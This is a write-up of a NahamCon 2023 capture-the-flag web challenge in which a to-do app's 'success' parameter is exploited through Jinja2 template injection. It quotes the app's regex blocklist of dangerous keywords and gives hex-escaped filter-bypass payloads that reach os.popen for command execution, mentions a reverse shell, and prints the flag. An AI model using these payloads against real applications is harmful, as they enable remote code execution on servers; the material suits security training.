Obligatory
Writeup for Obligatory (Web) - Nahamcon CTF (2023) π
Video Walkthrough
Description
Every Capture the Flag competition has to have an obligatory to-do list application, right???
Solution
Register account and try some payloads (XSS, SSTI, SQLi) but the notes all render as text without issues.
However, when a task is created there's a GET parameter success, that's set to Task created.
When changing the value to an SSTI polyglot, ${{<%[%'"}}%\, we get an error message.
HACKER DETECTED!!!!
The folowing are not allowed: [ {{\s*config\s*}},.*class.*,.*mro.*,.*import.*,.*builtins.*,.*popen.*,.*system.*,.*eval.*,.*exec.*,.*\..*,.*\[.*,.*\].*,.*\_\_.* ]Bypasses: https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#accessing-subclasses-with-bypasses
More bypasses here: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2---filter-bypass
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}It's blocked due to builtin and popen, so let's go through it manually.
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}We can use hex or concatenation to bypass the filter.
We don't get output.. let's hex encode a reverse shell.
Make the shell interactive.
Check the database folder.
We find the flag!
Flag: flag{7b5b91c60796488148ddf3b227735979}
Last updated